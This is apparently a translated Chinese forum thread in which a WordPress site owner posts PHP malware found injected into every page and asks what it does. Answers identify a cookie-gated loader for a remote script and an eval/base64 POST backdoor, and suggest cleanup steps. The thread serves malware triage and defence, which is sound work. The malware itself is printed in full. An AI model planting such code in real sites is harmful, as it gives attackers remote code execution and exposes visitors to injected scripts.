有人可以建议这个PHP代码会做什么吗?我只在每个.php页面上找到了这个代码。其他页面如js / css / php.ini都可以。这是恶意代码吗?如果是,请建议如何防止恶意活动。
以下是代码:
global $sessdt_o;
if(!$sessdt_o) {
$sessdt_o = 1;
$sessdt_k = "lb11";
if(!@$_COOKIE[$sessdt_k]) {
$sessdt_f = "102";
if(!@headers_sent()) {
@setcookie($sessdt_k,$sessdt_f);
} else {
echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";
}
} else {
if($_COOKIE[$sessdt_k]=="102") {
$sessdt_f = (rand(1000,9000)+1);
if(!@headers_sent()) {
@setcookie($sessdt_k,$sessdt_f);
} else {
echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>";
}
$sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"];
$sessdt_v = urlencode(strrev($sessdt_j));
$sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200);
echo "<script src='$sessdt_u'></script>";
echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
}
}
$sessdt_p = "showimg";
if(isset($_POST[$sessdt_p])){
eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
exit;
}
}
答案 0 :(得分:1)
它更有可能将您的每个页面重定向到攻击者网站。
@将暂停所有错误,因此您不会从此脚本中获取任何日志。
如果您希望自己的网站正常运行,则应将其删除。
编辑:它不会重定向,但会在您的网页上注入任何想要的内容。 它检查cookie的脚本的第二部分将从他的网站添加一个javascript,并可以做恶意的事情。最后一部分我认为没有人会猜到它是什么,因为它依赖于一些post变量而且$_POST['showimg'],我猜他用POST攻击了你的网站。
要做的事情:更改密码,检查文件的写入权限,不应该是0777,备份数据库和WordPress模板,删除WordPress安装并从头开始重新安装。在模板中搜索他的代码,然后添加清理过的模板。
答案 1 :(得分:1)
我没有仔细检查过,但只有一行
eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
已经告诉我,如果不是恶意的,那么非常接近 - 可以进行代码注入。
答案 2 :(得分:1)
你的问题不是代码本身,而是它首先出现的问题。您需要检查文件/文件夹的写入权限,以确保外部没有人可以修改它们。
您提到您正在使用wordpress,请阅读this article有关加强wordpress安全性的信息。我建议您锁定您的博客(如果可行),直到您解决安全问题为止。
答案 3 :(得分:0)
我是一名安全分析师,我相信当且仅当您没有该cookie时,它才会将您重定向到可能的恶意网站。如果您已经拥有该cookie,则该脚本将知道您已经在那里并且可能正在研究恶意软件,从而不执行重定向。图像可能类似于检测调试器预设API ..这只是我的意见。